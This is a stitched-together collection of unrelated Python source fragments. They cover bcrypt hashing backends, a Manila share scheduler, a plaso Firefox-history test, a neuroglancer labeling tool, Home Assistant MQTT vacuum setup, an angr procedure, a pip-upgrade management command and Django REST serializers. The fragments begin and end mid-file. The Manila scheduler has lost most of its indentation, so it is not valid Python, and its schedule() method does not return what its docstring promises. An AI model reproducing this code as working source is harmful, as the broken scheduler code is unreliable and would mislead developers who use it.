        h2 = '$2a$04$......................qiOQjkB8hxU8OzRhS.GhRMa4VUnkPty'
        return test_crypt("test",h1) and test_crypt("test", h2)

    @classmethod
    def _no_backends_msg(cls):
        return "no bcrypt backends available - please install py-bcrypt"

    def _calc_checksum_os_crypt(self, secret):
        config = self._get_config()
        hash = safe_crypt(secret, config)
        if hash:
            # crypt(3) returns the full hash; keep only the 31-char checksum.
            assert hash.startswith(config) and len(hash) == len(config)+31
            return hash[-31:]
        else:
            # NOTE: it's unlikely any other backend will be available,
            # but checking before we bail, just in case.
            for name in self.backends:
                if name != "os_crypt" and self.has_backend(name):
                    func = getattr(self, "_calc_checksum_" + name)
                    return func(secret)
            raise uh.exc.MissingBackendError(
                "password can't be handled by os_crypt, "
                "recommend installing py-bcrypt.",
                )

    def _calc_checksum_pybcrypt(self, secret):
        # py-bcrypt behavior:
        #   py2: unicode secret/hash encoded as ascii bytes before use,
        #        bytes taken as-is; returns ascii bytes.
        #   py3: not supported (patch submitted)
        if isinstance(secret, unicode):
            secret = secret.encode("utf-8")
        if _BNULL in secret:
            raise uh.exc.NullPasswordError(self)
        config = self._get_config()
        hash = pybcrypt_hashpw(secret, config)
        assert hash.startswith(config) and len(hash) == len(config)+31
        return str_to_uascii(hash[-31:])

    def _calc_checksum_bcryptor(self, secret):
        # bcryptor behavior:
        #   py2: unicode secret/hash encoded as ascii bytes before use,
        #        bytes taken as-is; returns ascii bytes.
        #   py3: not supported
        if isinstance(secret, unicode):
            secret = secret.encode("utf-8")
        if _BNULL in secret:
            # NOTE: especially important to forbid NULLs for bcryptor,
            # since it happily accepts them, and then silently truncates
            # the password at first one it encounters :(
            raise uh.exc.NullPasswordError(self)
        if self.ident == IDENT_2:
            # bcryptor doesn't support $2$ hashes; but we can fake $2$ behavior
            # using the $2a$ algorithm, by repeating the password until
            # it's at least 72 chars in length.
            if secret:
                secret = repeat_string(secret, 72)
            config = self._get_config(IDENT_2A)
        else:
            config = self._get_config()
        hash = bcryptor_engine(False).hash_key(secret, config)
        assert hash.startswith(config) and len(hash) == len(config)+31
        return str_to_uascii(hash[-31:])

    def _calc_checksum_builtin(self, secret):
        if isinstance(secret, unicode):
            secret = secret.encode("utf-8")
        if _BNULL in secret:
            raise uh.exc.NullPasswordError(self)
        # raw_bcrypt wants the ident without surrounding "$" markers.
        chk = _builtin_bcrypt(secret, self.ident.strip("$"),
                              self.salt.encode("ascii"), self.rounds)
        return chk.decode("ascii")

    #===================================================================
    # eoc
    #===================================================================
|
"""
The FilterScheduler is for creating shares.
You can customize this scheduler by specifying your own share Filters and
Weighing Functions.
"""
import operator
from manila import exception
from manila.openstack.common import importutils
from manila.openstack.common import log as logging
from manila.scheduler import driver
from manila.scheduler import scheduler_options
from oslo.config import cfg
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
class FilterScheduler(driver.Scheduler):
"""Scheduler that can be used for filtering and weighing."""
    def __init__(self, *args, **kwargs):
        super(FilterScheduler, self).__init__(*args, **kwargs)
        self.cost_function_cache = None  # reserved; not populated here
        self.options = scheduler_options.SchedulerOptions()
        # validated once up front so bad config fails at startup
        self.max_attempts = self._max_attempts()
def schedule(self, context, topic, method, *args, **kwargs):
"""The schedule() contract requires we return the one
best-suited host for this request.
"""
self._schedule(context, topic, *args, **kwargs)
def _get_configuration_options(self):
"""Fetch options dictionary. Broken out for testing."""
return self.options.get_configuration()
    def _post_select_populate_filter_properties(self, filter_properties,
                                                host_state):
        """Add additional information to the filter properties after a host has
        been selected by the scheduling process.
        """
        # Add a retry entry for the selected volume backend:
        self._add_retry_host(filter_properties, host_state.host)
def _add_retry_host(self, filter_properties, host):
"""Add a retry entry for the selected volume backend. In the event that
the request gets re-scheduled, this entry will signal that the given
backend has already been tried.
"""
retry = filter_properties.get('retry', None)
if not retry:
return
hosts = retry['hosts']
hosts.append(host)
def _max_attempts(self):
max_attempts = CONF.scheduler_max_attempts
if max_attempts < 1:
msg = _("Invalid value for 'scheduler_max_attempts', "
"must be >=1")
raise exception.InvalidParameterValue(err=msg)
return max_attempts
def schedule_create_share(self, context, request_spec, filter_properties):
weighed_host = self._schedule_share(context,
request_spec,
filter_properties)
if not weighed_host:
raise exception.NoValidHost(reason="")
host = weighed_host.obj.host
share_id = request_spec['share_id']
snapshot_id = request_spec['snapshot_id']
updated_share = driver.share_update_db(context, share_id, host)
self._post_select_populate_filter_properties(filter_properties,
weighed_host.obj)
# context is not serializable
filter_properties.pop('context', None)
self.share_rpcapi.create_share(context, updated_share, host,
request_spec=request_spec,
filter_properties=filter_properties,
snapshot_id=snapshot_id)
def _schedule_share(self, context, request_spec, filter_properties=None):
"""Returns a list of hosts that meet the required specs,
ordered by their fitness.
"""
elevated = context.elevated()
share_properties = request_spec['share_properties']
# Since Manila is using mixed filters from Oslo and it's own, which
# takes 'resource_XX' and 'volume_XX' as input respectively, copying
# 'volume_XX' to 'resource_XX' will make both filters happy.
resource_properties = share_properties.copy()
share_type = request_spec.get("share_type", {})
resource_type = request_spec.get("share_type", {})
request_spec.update({'resource_properties': resource_properties})
config_options = self._get_configuration_options()
if filter_properties is None:
filter_properties = {}
self._populate_retry_share(filter_properties, resource_properties)
filter_properties.update({'context': context,
'request_spec': request_spec,
'config_options': config_options,
'share_type': share_type,
'resource_type': resource_type
})
self.populate_filter_properties_share(request_spec, filter_properties)
# Find our local list of acceptable hosts by filtering and
# weighing our options. we virtually consume resources on
# it so subsequent selections can adjust accordingly.
# Note: remember, we are using an iterator here. So only
# traverse this list once.
hosts = self.host_manager.get_all_host_states_share(elevated)
# Filter local hosts based on requirements ...
hosts = self.host_manager.get_filtered_hosts(hosts,
filter_properties)
if not hosts:
return None
LOG.debug(_("Filtered share %(hosts)s") % locals())
# weighted_host = WeightedHost() ... the best
# host for the job.
weighed_hosts = self.host_manager.get_weighed_hosts(hosts,
filter_properties)
best_host = weighed_hosts[0]
LOG.debug(_("Choosing for share: %(best_host)s") % locals())
#NOTE(rushiagr): updating the available space parameters at same place
best_host.obj.consume_from_volume(share_properties)
return best_host
def _populate_retry_share(self, filter_properties, properties):
"""Populate filter properties with history of retries for this
request. If maximum retries is exceeded, raise NoValidHost.
"""
max_attempts = self.max_attempts
retry = filter_properties.pop('retry', {})
if max_attempts == 1:
# re-scheduling is disabled.
return
# retry is enabled, update attempt count:
if retry:
retry['num_attempts'] += 1
else:
retry = {
'num_attempts': 1,
'hosts': [] # list of share service hosts tried
}
filter_properties['retry'] = retry
share_id = properties.get('share_id')
self._log_share_error(share_id, retry)
if retry['num_attempts'] > max_attempts:
msg = _("Exceeded max scheduling attempts %(max_attempts)d for "
"share %(share_id)s") % locals()
raise exception.NoValidHost(reason=msg)
def _log_share_error(self, share_id, retry):
"""If the request contained an exception from a previous share
create operation, log it to aid debugging.
"""
exc = retry.pop('exc', None) # string-ified exception from share
if not exc:
return # no exception info from a previous attempt, skip
hosts = retry.get('hosts', None)
if not hosts:
return # no previously attempted hosts, skip
last_host = hosts[-1]
msg = _("Error scheduling %(share_id)s from last share-service: "
"%(last_host)s : %(exc)s") % locals()
LOG.error(msg)
def populate_filter_properties_share(self, request_spec,
filter_properties):
"""Stuff things into filter_properties. Can be overridden in a
subclass to add more data.
"""
shr = request_spec['share_properties']
filter_properties['size'] = shr['size']
filter_properties['availability_zone'] = shr.get('availability_zone')
filter_properties['user_id'] = shr.get('user_id')
filter_properties['metadata'] = shr.get('metadata')
|
"""Tests for the Mozilla Firefox history database plugin."""
import collections
import unittest
from plaso.lib import definitions
from plaso.parsers.sqlite_plugins import firefox_history
from tests.parsers.sqlite_plugins import test_lib
class FirefoxHistoryPluginTest(test_lib.SQLitePluginTestCase):
  """Tests for the Mozilla Firefox history database plugin."""

  def _AssertNoWarnings(self, storage_writer):
    """Asserts that no extraction or recovery warnings were produced."""
    for container_type in ('extraction_warning', 'recovery_warning'):
      number_of_warnings = storage_writer.GetNumberOfAttributeContainers(
          container_type)
      self.assertEqual(number_of_warnings, 0)

  def testProcessPriorTo24(self):
    """Tests the Process function on a Firefox History database file."""
    # This is probably version 23 but potentially an older version.
    plugin = firefox_history.FirefoxHistoryPlugin()
    storage_writer = self._ParseDatabaseFileWithPlugin(
        ['places.sqlite'], plugin)

    # The places.sqlite file contains 205 events (1 page visit,
    # 2 x 91 bookmark records, 2 x 3 bookmark annotations,
    # 2 x 8 bookmark folders).
    # However there are three events that do not have a timestamp
    # so the test file will show 202 extracted events.
    number_of_events = storage_writer.GetNumberOfAttributeContainers('event')
    self.assertEqual(number_of_events, 202)

    self._AssertNoWarnings(storage_writer)

    events = list(storage_writer.GetEvents())

    # Spot-check the first page visit, the first two bookmarks, two bookmark
    # annotations and the last two bookmark folder events.
    expectations = [
        (0, {
            'data_type': 'firefox:places:page_visited',
            'date_time': '2011-07-01 11:16:21.371935',
            'host': 'news.google.com',
            'timestamp_desc': definitions.TIME_DESCRIPTION_LAST_VISITED,
            'title': 'Google News',
            'url': 'http://news.google.com/',
            'visit_count': 1,
            'visit_type': 2}),
        (1, {
            'data_type': 'firefox:places:bookmark',
            'date_time': '2011-07-01 11:13:59.266344',
            'timestamp_desc': definitions.TIME_DESCRIPTION_ADDED}),
        (2, {
            'data_type': 'firefox:places:bookmark',
            'date_time': '2011-07-01 11:13:59.267198',
            'places_title': (
                'folder=BOOKMARKS_MENU&folder=UNFILED_BOOKMARKS&folder=TOOLBAR&'
                'sort=12&excludeQueries=1&excludeItemIfParentHasAnnotation=livemark'
                '%2FfeedURI&maxResults=10&queryType=1'),
            'timestamp_desc': definitions.TIME_DESCRIPTION_MODIFICATION,
            'title': 'Recently Bookmarked',
            'type': 'URL',
            'url': (
                'place:folder=BOOKMARKS_MENU&folder=UNFILED_BOOKMARKS&folder='
                'TOOLBAR&sort=12&excludeQueries=1&excludeItemIfParentHasAnnotation='
                'livemark%2FfeedURI&maxResults=10&queryType=1'),
            'visit_count': 0}),
        (183, {
            'data_type': 'firefox:places:bookmark_annotation',
            'date_time': '2011-07-01 11:13:59.267146',
            'timestamp_desc': definitions.TIME_DESCRIPTION_ADDED}),
        (184, {
            'content': 'RecentTags',
            'data_type': 'firefox:places:bookmark_annotation',
            'date_time': '2011-07-01 11:13:59.267605',
            'timestamp_desc': definitions.TIME_DESCRIPTION_ADDED,
            'title': 'Recent Tags',
            'url': 'place:sort=14&type=6&maxResults=10&queryType=1'}),
        (200, {
            'data_type': 'firefox:places:bookmark_folder',
            'date_time': '2011-03-21 10:05:01.553774',
            'timestamp_desc': definitions.TIME_DESCRIPTION_ADDED}),
        (201, {
            'data_type': 'firefox:places:bookmark_folder',
            'date_time': '2011-07-01 11:14:11.766851',
            'timestamp_desc': definitions.TIME_DESCRIPTION_MODIFICATION,
            'title': 'Latest Headlines'})]

    for event_index, expected_event_values in expectations:
      self.CheckEventValues(
          storage_writer, events[event_index], expected_event_values)

  def testProcessVersion25(self):
    """Tests the Process function on a Firefox History database file v 25."""
    plugin = firefox_history.FirefoxHistoryPlugin()
    storage_writer = self._ParseDatabaseFileWithPlugin(
        ['places_new.sqlite'], plugin)

    # The places.sqlite file contains 84 events:
    # 34 page visits.
    # 28 bookmarks
    # 14 bookmark folders
    # 8 annotations
    number_of_events = storage_writer.GetNumberOfAttributeContainers('event')
    self.assertEqual(number_of_events, 84)

    self._AssertNoWarnings(storage_writer)

    events = list(storage_writer.GetEvents())

    # Tally events per data type and compare against the breakdown above.
    counter = collections.Counter(
        self._GetEventDataOfEvent(storage_writer, event).data_type
        for event in events)

    self.assertEqual(counter['firefox:places:bookmark'], 28)
    self.assertEqual(counter['firefox:places:page_visited'], 34)
    self.assertEqual(counter['firefox:places:bookmark_folder'], 14)
    self.assertEqual(counter['firefox:places:bookmark_annotation'], 8)

    expected_event_values = {
        'data_type': 'firefox:places:page_visited',
        'date_time': '2013-10-30 21:57:11.281942',
        'host': 'code.google.com',
        'url': 'http://code.google.com/p/plaso',
        'visit_count': 1,
        'visit_type': 2}

    self.CheckEventValues(storage_writer, events[10], expected_event_values)
# Allow running this test module directly.
if __name__ == '__main__':
  unittest.main()
|
from __future__ import absolute_import

from .factory import toolkit_factory

# Resolve the concrete text-editor implementation registered for the active
# toolkit; "myTextEditor" is the registry key used by the factory.
myTextEditor = toolkit_factory("text_editor", "myTextEditor")
|
"""Context manager to help with Control-C handling during critical commands."""
import signal
from googlecloudsdk.calliope import exceptions
from googlecloudsdk.core import log
from googlecloudsdk.test.lib import exit_code
class CancellableTestSection(object):
  """Cancel a test matrix if CTRL-C is typed during a section of code.

  While within this context manager, the CTRL-C signal is caught and a test
  matrix is cancelled. This should only be used with a section of code where
  the test matrix is running.
  """

  def __init__(self, matrix_id, testing_api_helper):
    self._saved_sigint_handler = None
    self._matrix_id = matrix_id
    self._testing_api_helper = testing_api_helper

  def __enter__(self):
    # Remember the active handler so __exit__ can restore it.
    self._saved_sigint_handler = signal.getsignal(signal.SIGINT)
    signal.signal(signal.SIGINT, self._Handler)
    return self

  def __exit__(self, typ, value, traceback):
    signal.signal(signal.SIGINT, self._saved_sigint_handler)
    # Returning False propagates any exception raised in the managed block.
    return False

  def _Handler(self, unused_signal, unused_frame):
    log.status.write(
        '\n\nCancelling test [{id}]...\n\n'.format(id=self._matrix_id))
    self._testing_api_helper.CancelTestMatrix(self._matrix_id)
    raise exceptions.ExitCodeNoError(exit_code=exit_code.MATRIX_CANCELLED)
|
import sys
import random

# Usage: script <file-with-filenames> <count>
# Prints <count> filenames drawn uniformly (with replacement) from the list.
if len(sys.argv) != 3:
    sys.stderr.write("Must provide file with list of filenames and number of files to pick\n")
    sys.exit(1)

# Read the candidate filenames, one per line. Bug fix: the original opened
# the file without ever closing it; use a context manager instead.
with open(sys.argv[1]) as file_list:
    file_array = [filepath.strip() for filepath in file_list]

try:
    choices = int(sys.argv[2])
except ValueError:
    # Bug fix: the original bare ``except:`` also swallowed SystemExit and
    # KeyboardInterrupt; only a malformed integer is expected here.
    sys.stderr.write("Can't get the number of files to pick\n")
    sys.exit(1)

# NOTE(review): random.choice raises IndexError on an empty input file --
# presumably callers always supply a non-empty list; confirm before hardening.
for _ in range(choices):
    sys.stdout.write("%s\n" % random.choice(file_array))
|
from __future__ import division
import json
import os
import copy
import collections
import argparse
import csv
import neuroglancer
import neuroglancer.cli
import numpy as np
class State(object):
    """Persists segment-id -> label assignments as JSON at ``path``."""

    def __init__(self, path):
        self.path = path
        # Ordered so labels round-trip in assignment order.
        self.body_labels = collections.OrderedDict()

    def load(self):
        """Loads previously saved labels, if the state file exists."""
        if os.path.exists(self.path):
            with open(self.path, 'r') as f:
                self.body_labels = collections.OrderedDict(json.load(f))

    def save(self):
        """Atomically writes the labels: write a temp file, then rename."""
        tmp_path = self.path + '.tmp'
        with open(tmp_path, 'w') as f:
            # Bug fix: ``dict.items()`` returns a non-serializable view on
            # Python 3, so ``json.dumps`` raised TypeError. Serialize a list
            # of [key, value] pairs, which is also what load() reads back.
            f.write(json.dumps(list(self.body_labels.items())))
        os.rename(tmp_path, self.path)
# One candidate segment to proofread: its id, voxel count, and bounding box
# (start corner plus size; both are int64 xyz vectors -- see the CSV loader).
Body = collections.namedtuple('Body', ['segment_id', 'num_voxels', 'bbox_start', 'bbox_size'])
class Tool(object):
    """Interactive neuroglancer viewer for labeling a list of bodies.

    Shows one body at a time; key bindings assign a label to the current body
    and navigation keys move through the list. Labels are persisted via State.
    """

    def __init__(self, state_path, bodies, labels, segmentation_url, image_url, num_to_prefetch):
        self.state = State(state_path)
        self.num_to_prefetch = num_to_prefetch
        self.viewer = neuroglancer.Viewer()
        self.bodies = bodies
        self.state.load()
        # Totals used only for the progress line in the status message.
        self.total_voxels = sum(x.num_voxels for x in bodies)
        self.cumulative_voxels = np.cumsum([x.num_voxels for x in bodies])

        with self.viewer.txn() as s:
            s.layers['image'] = neuroglancer.ImageLayer(source=image_url)
            s.layers['segmentation'] = neuroglancer.SegmentationLayer(source=segmentation_url)
            s.show_slices = False
            s.concurrent_downloads = 256
            s.gpu_memory_limit = 2 * 1024 * 1024 * 1024
            s.layout = '3d'

        key_bindings = [
            ['bracketleft', 'prev-index'],
            ['bracketright', 'next-index'],
            ['home', 'first-index'],
            ['end', 'last-index'],
            ['control+keys', 'save'],
        ]
        # At most four labels are supported by the available label keys.
        label_keys = ['keyd', 'keyf', 'keyg', 'keyh']
        for label, label_key in zip(labels, label_keys):
            key_bindings.append([label_key, 'label-%s' % label])

            # ``label=label`` binds the current loop value as a default,
            # avoiding the classic late-binding closure bug.
            def label_func(s, label=label):
                self.set_label(s, label)

            self.viewer.actions.add('label-%s' % label, label_func)
        self.viewer.actions.add('prev-index', self._prev_index)
        self.viewer.actions.add('next-index', self._next_index)
        self.viewer.actions.add('first-index', self._first_index)
        self.viewer.actions.add('last-index', self._last_index)
        self.viewer.actions.add('save', self.save)

        with self.viewer.config_state.txn() as s:
            for key, command in key_bindings:
                s.input_event_bindings.viewer[key] = command
            s.status_messages['help'] = ('KEYS: ' + ' | '.join('%s=%s' % (key, command)
                                                               for key, command in key_bindings))

        # -1 guarantees the initial set_index() call is not a no-op.
        self.index = -1
        self.set_index(self._find_one_after_last_labeled_index())

    def _find_one_after_last_labeled_index(self):
        """Returns the index of the first body without a stored label.

        NOTE(review): if every body is already labeled this walks past the
        end of ``self.bodies`` and set_index() raises IndexError -- confirm
        whether that case can occur in practice.
        """
        body_index = 0
        while self.bodies[body_index].segment_id in self.state.body_labels:
            body_index += 1
        return body_index

    def set_index(self, index):
        """Displays body ``index``: updates layers, prefetch, and status."""
        if index == self.index:
            return
        body = self.bodies[index]
        self.index = index

        def modify_state_for_body(s, body):
            # Show only this body's segment and center the view on its bbox.
            s.layers['segmentation'].segments = frozenset([body.segment_id])
            s.voxel_coordinates = body.bbox_start + body.bbox_size // 2

        with self.viewer.txn() as s:
            modify_state_for_body(s, body)

        # Queue prefetch states for the next few bodies so navigation is fast.
        prefetch_states = []
        for i in range(self.num_to_prefetch):
            prefetch_index = self.index + i + 1
            if prefetch_index >= len(self.bodies):
                break
            prefetch_state = copy.deepcopy(self.viewer.state)
            prefetch_state.layout = '3d'
            modify_state_for_body(prefetch_state, self.bodies[prefetch_index])
            prefetch_states.append(prefetch_state)

        with self.viewer.config_state.txn() as s:
            s.prefetch = [
                neuroglancer.PrefetchState(state=prefetch_state, priority=-i)
                for i, prefetch_state in enumerate(prefetch_states)
            ]

        label = self.state.body_labels.get(body.segment_id, '')
        with self.viewer.config_state.txn() as s:
            s.status_messages['status'] = (
                '[Segment %d/%d : %d/%d voxels labeled = %.3f fraction] label=%s' %
                (index, len(self.bodies), self.cumulative_voxels[index], self.total_voxels,
                 self.cumulative_voxels[index] / self.total_voxels, label))

    def save(self, s):
        """Action callback: persists labels to disk (argument unused)."""
        self.state.save()

    def set_label(self, s, label):
        """Labels the current body and advances to the next one.

        NOTE(review): labeling the final body advances past the end of the
        list, so the subsequent set_index() raises IndexError -- verify.
        """
        self.state.body_labels[self.bodies[self.index].segment_id] = label
        self.set_index(self.index + 1)

    def _first_index(self, s):
        self.set_index(0)

    def _last_index(self, s):
        self.set_index(max(0, self._find_one_after_last_labeled_index() - 1))

    def _next_index(self, s):
        self.set_index(self.index + 1)

    def _prev_index(self, s):
        self.set_index(max(0, self.index - 1))
if __name__ == '__main__':
    # Command line: server options plus data-source URLs and the body list.
    parser = argparse.ArgumentParser()
    neuroglancer.cli.add_server_arguments(parser)
    parser.add_argument('--image-url', required=True, help='Neuroglancer data source URL for image')
    parser.add_argument('--segmentation-url',
                        required=True,
                        help='Neuroglancer data source URL for segmentation')
    parser.add_argument('--state', required=True, help='Path to proofreading state file')
    parser.add_argument('--bodies', required=True, help='Path to list of bodies to proofread')
    parser.add_argument('--labels', nargs='+', help='Labels to use')
    parser.add_argument('--prefetch', type=int, default=10, help='Number of bodies to prefetch')
    args = parser.parse_args()
    neuroglancer.cli.handle_server_arguments(args)

    def _int64_triple(row, prefix):
        # Read an xyz triple such as "bbox.start.{x,y,z}" from a CSV row.
        return np.array(
            [int(row[prefix + '.x']),
             int(row[prefix + '.y']),
             int(row[prefix + '.z'])],
            dtype=np.int64)

    # Load the bodies to proofread from the CSV manifest.
    bodies = []
    with open(args.bodies, 'r') as f:
        for row in csv.DictReader(f):
            bodies.append(
                Body(
                    segment_id=int(row['id']),
                    num_voxels=int(row['num_voxels']),
                    bbox_start=_int64_triple(row, 'bbox.start'),
                    bbox_size=_int64_triple(row, 'bbox.size'),
                ))

    tool = Tool(
        state_path=args.state,
        image_url=args.image_url,
        segmentation_url=args.segmentation_url,
        labels=args.labels,
        bodies=bodies,
        num_to_prefetch=args.prefetch,
    )
    print(tool.viewer)
|
"""
"""
from __future__ import absolute_import
from .StrStrHashMap import *
from ..msg.Field import *
from ..msg.ImportExportHelper import *
from ..msg.StructValue import *
from ..msg.Type import *
from ..msg.ValueFactory import *
from ..support.Class2TypeMap import *
from ..support.Validator_object import *
class StrStrHashMapSerializer(ImportExportHelper):
    """
    etch serializer for StrStrHashMap
    """
    FIELD_NAME = "keysAndValues"

    @classmethod
    def init(cls, typ, class2type):
        """
        Defines custom fields in the value factory so that the importer can find them
        @param typ
        @param class2type
        """
        field = typ.getField(cls.FIELD_NAME)
        class2type.put(StrStrHashMap, typ)
        typ.setComponentType(StrStrHashMap)
        typ.setImportExportHelper(StrStrHashMapSerializer(typ, field))
        typ.putValidator(field, Validator_object.get(1))
        typ.lock()

    def __init__(self, typ, field):
        self.__type = typ
        self.__field = field

    def importHelper(self, struct):
        """Rebuilds a StrStrHashMap from the flat [k0, v0, k1, v1, ...] list."""
        mapping = StrStrHashMap()
        flat = struct.get(self.__field)
        index = 0
        while index < len(flat):
            mapping[flat[index]] = flat[index + 1]
            index += 2
        return mapping

    def exportValue(self, vf, value):
        """Flattens the map into alternating key/value entries in a struct."""
        mapping = StrStrHashMap(value)
        flat = []
        for key in mapping.keys():
            flat += [key, mapping[key]]
        struct = StructValue(self.__type, vf)
        struct.put(self.__field, flat)
        return struct
|
"""
Support for MQTT vacuums.
For more details about this platform, please refer to the documentation at
https://www.home-assistant.io/components/vacuum.mqtt/
"""
import logging
import voluptuous as vol
from homeassistant.components.vacuum import DOMAIN
from homeassistant.components.mqtt import ATTR_DISCOVERY_HASH
from homeassistant.components.mqtt.discovery import (
MQTT_DISCOVERY_NEW,
clear_discovery_hash,
)
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from .schema import CONF_SCHEMA, LEGACY, STATE, MQTT_VACUUM_SCHEMA
from .schema_legacy import PLATFORM_SCHEMA_LEGACY, async_setup_entity_legacy
from .schema_state import PLATFORM_SCHEMA_STATE, async_setup_entity_state
_LOGGER = logging.getLogger(__name__)
def validate_mqtt_vacuum(value):
    """Validate MQTT vacuum schema."""
    # Dispatch on the configured schema type; an unknown value raises
    # KeyError, matching the original behavior.
    schema_for = {LEGACY: PLATFORM_SCHEMA_LEGACY, STATE: PLATFORM_SCHEMA_STATE}
    selected_schema = schema_for[value[CONF_SCHEMA]]
    return selected_schema(value)
# Accept any extra keys during the first pass; validate_mqtt_vacuum then
# re-validates the payload against the schema selected by CONF_SCHEMA.
PLATFORM_SCHEMA = vol.All(
    MQTT_VACUUM_SCHEMA.extend({}, extra=vol.ALLOW_EXTRA), validate_mqtt_vacuum
)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
    """Set up MQTT vacuum through configuration.yaml."""
    # NOTE(review): discovery_info is passed into the ``config_entry``
    # parameter of _async_setup_entity. For YAML setup it is normally None,
    # but the aliasing looks accidental -- confirm against the helper.
    await _async_setup_entity(config, async_add_entities, discovery_info)
async def async_setup_entry(hass, config_entry, async_add_entities):
    """Set up MQTT vacuum dynamically through MQTT discovery."""

    async def async_discover(discovery_payload):
        """Discover and add a MQTT vacuum."""
        # Bug fix: pre-bind so the except clause below cannot hit an unbound
        # name when the pop() itself raises (e.g. a payload without a hash),
        # which previously masked the real error with a NameError.
        discovery_hash = None
        try:
            discovery_hash = discovery_payload.pop(ATTR_DISCOVERY_HASH)
            config = PLATFORM_SCHEMA(discovery_payload)
            await _async_setup_entity(
                config, async_add_entities, config_entry, discovery_hash
            )
        except Exception:
            # Release the claimed hash so the device can be rediscovered,
            # then let the original exception propagate.
            if discovery_hash:
                clear_discovery_hash(hass, discovery_hash)
            raise

    async_dispatcher_connect(
        hass, MQTT_DISCOVERY_NEW.format(DOMAIN, "mqtt"), async_discover
    )
async def _async_setup_entity(
    config, async_add_entities, config_entry, discovery_hash=None
):
    """Set up the MQTT vacuum."""
    # Pick the entity factory matching the configured schema type; an unknown
    # schema raises KeyError, same as the original dispatch table.
    factories = {LEGACY: async_setup_entity_legacy, STATE: async_setup_entity_state}
    factory = factories[config[CONF_SCHEMA]]
    await factory(config, async_add_entities, config_entry, discovery_hash)
|
import json
from idpproxy.social.oauth import OAuth
import oauth2 as oauth
import logging
logger = logging.getLogger(__name__)
__author__ = 'rohe0002'
class LinkedIn(OAuth):
    """idpproxy social backend for LinkedIn using OAuth 1.0a."""

    def __init__(self, client_id, client_secret, **kwargs):
        OAuth.__init__(self, client_id, client_secret, **kwargs)

    def get_profile(self, info_set):
        """Fetch the user's LinkedIn profile with the stored OAuth token.

        Returns the (HTTP response, profile dict) pair; the profile gains a
        "user_id" key derived from the OAuth token.
        """
        token = oauth.Token(key=info_set["oauth_token"][0],
                            secret=info_set["oauth_token_secret"][0])
        client = oauth.Client(self.consumer, token)
        resp, content = client.request(self.extra["userinfo_endpoint"], "GET")
        res = json.loads(content)
        logger.debug("userinfo: %s" % res)
        # NOTE(review): this assigns the whole list, while the token lookups
        # above use element [0] -- looks like it should be
        # info_set["oauth_token"][0]; confirm against downstream consumers.
        res["user_id"] = info_set["oauth_token"]
        return resp, res
|
import angr
class InterlockedExchange(angr.SimProcedure):
    """Models Win32 InterlockedExchange: swap *target with value, return old."""

    def run(self, target, value):  # pylint:disable=arguments-differ
        if not self.state.solver.symbolic(target):
            # Concrete pointer: read the old 32-bit value, then overwrite it.
            old_value = self.state.memory.load(target, 4, endness=self.state.arch.memory_endness)
            # NOTE(review): the store omits endness= while the load specifies
            # it -- on non-default-endian targets the bytes may be swapped;
            # confirm intended behavior.
            self.state.memory.store(target, value)
        else:
            # Symbolic pointer: give up on modeling the memory effect and
            # return an unconstrained value (no store is performed).
            old_value = self.state.solver.Unconstrained("unconstrained_ret_%s" % self.display_name, self.state.arch.bits, key=('api', 'InterlockedExchange'))
        return old_value
|
import subprocess
from rstgen.utils import confirm
from django.core.management.base import BaseCommand
from django.conf import settings
def runcmd(cmd, **kw):  # same code as in getlino.py
    """Run the cmd similar as os.system(), but stop when Ctrl-C."""
    # Force shell execution with text-mode streams, and raise
    # CalledProcessError on a non-zero exit status.
    kw.update(shell=True, universal_newlines=True, check=True)
    subprocess.run(cmd, **kw)
class Command(BaseCommand):
    help = "Run 'pip install --upgrade' for all Python packages required by this site."

    requires_system_checks = False

    def add_arguments(self, parser):
        parser.add_argument('--noinput', action='store_false',
                            dest='interactive', default=True,
                            help='Do not prompt for input of any kind.')
        parser.add_argument('-l', '--list', action='store_true',
                            dest='list', default=False,
                            help="Just list the requirements, don't install them.")

    def handle(self, *args, **options):
        """Collect the site's requirements and pip-install them (or list)."""
        # Deduplicate first; requirements may be declared by several plugins.
        reqs = set(settings.SITE.get_requirements())
        if len(reqs) == 0:
            print("No requirements")
        else:
            reqs = sorted(reqs)
            if options['list']:
                print('\n'.join(reqs))
                return
            # Upgrade pip itself before installing the site requirements.
            runcmd('pip install --upgrade pip')
            # cmd = "pip install --upgrade --trusted-host svn.forge.pallavi.be {}".format(' '.join(reqs))
            cmd = "pip install --upgrade {}".format(' '.join(reqs))
            # Ask for confirmation unless --noinput was given.
            if not options['interactive'] or confirm("{} (y/n) ?".format(cmd)):
                runcmd(cmd)
|
import shutil
import json
from rest_framework import routers, serializers, viewsets, parsers, filters
from rest_framework.views import APIView
from rest_framework.exceptions import APIException
from rest_framework.response import Response
from django.core.exceptions import ValidationError
from django.core.files.uploadedfile import SimpleUploadedFile, InMemoryUploadedFile
from django.core.validators import URLValidator
from base.models import Project, SeedsList
from apps.crawl_space.models import Crawl, CrawlModel
from elasticsearch import Elasticsearch
from elasticsearch.exceptions import ConnectionError, NotFoundError
# DRF exception translated into a 404 response by the exception handler.
class DataWakeIndexUnavailable(APIException):
    status_code = 404
    default_detail = "The server failed to find the DataWake index in elasticsearch."
# Base serializer for models with a server-generated slug: clients can read
# the slug but never set it.
class SlugModelSerializer(serializers.ModelSerializer):
    slug = serializers.SlugField(required=False, read_only=True)
class ProjectSerializer(SlugModelSerializer):
    # Computed on the model; clients cannot set it.
    url = serializers.CharField(read_only=True)

    class Meta:
        model = Project
class CrawlSerializer(SlugModelSerializer):
    # Expose these fields, but only as read only.
    id = serializers.ReadOnlyField()
    seeds_list = serializers.FileField(read_only=True, use_url=False)
    status = serializers.CharField(read_only=True)
    config = serializers.CharField(read_only=True)
    index_name = serializers.CharField(read_only=True)
    url = serializers.CharField(read_only=True)
    pages_crawled = serializers.IntegerField(read_only=True)
    harvest_rate = serializers.FloatField(read_only=True)
    location = serializers.CharField(read_only=True)

    def validate_crawler(self, value):
        """Reject "ache" crawls that are submitted without a crawl model."""
        if value == "ache" and not self.initial_data.get("crawl_model"):
            raise serializers.ValidationError("Ache crawls require a Crawl Model.")
        return value

    class Meta:
        model = Crawl
class CrawlModelSerializer(SlugModelSerializer):
    model = serializers.FileField(use_url=False)
    features = serializers.FileField(use_url=False)
    url = serializers.CharField(read_only=True)

    def validate_model(self, value):
        # The crawler looks the file up by this exact name.
        if value.name != "pageclassifier.model":
            raise serializers.ValidationError("File must be named pageclassifier.model")
        return value

    def validate_features(self, value):
        # The crawler looks the file up by this exact name.
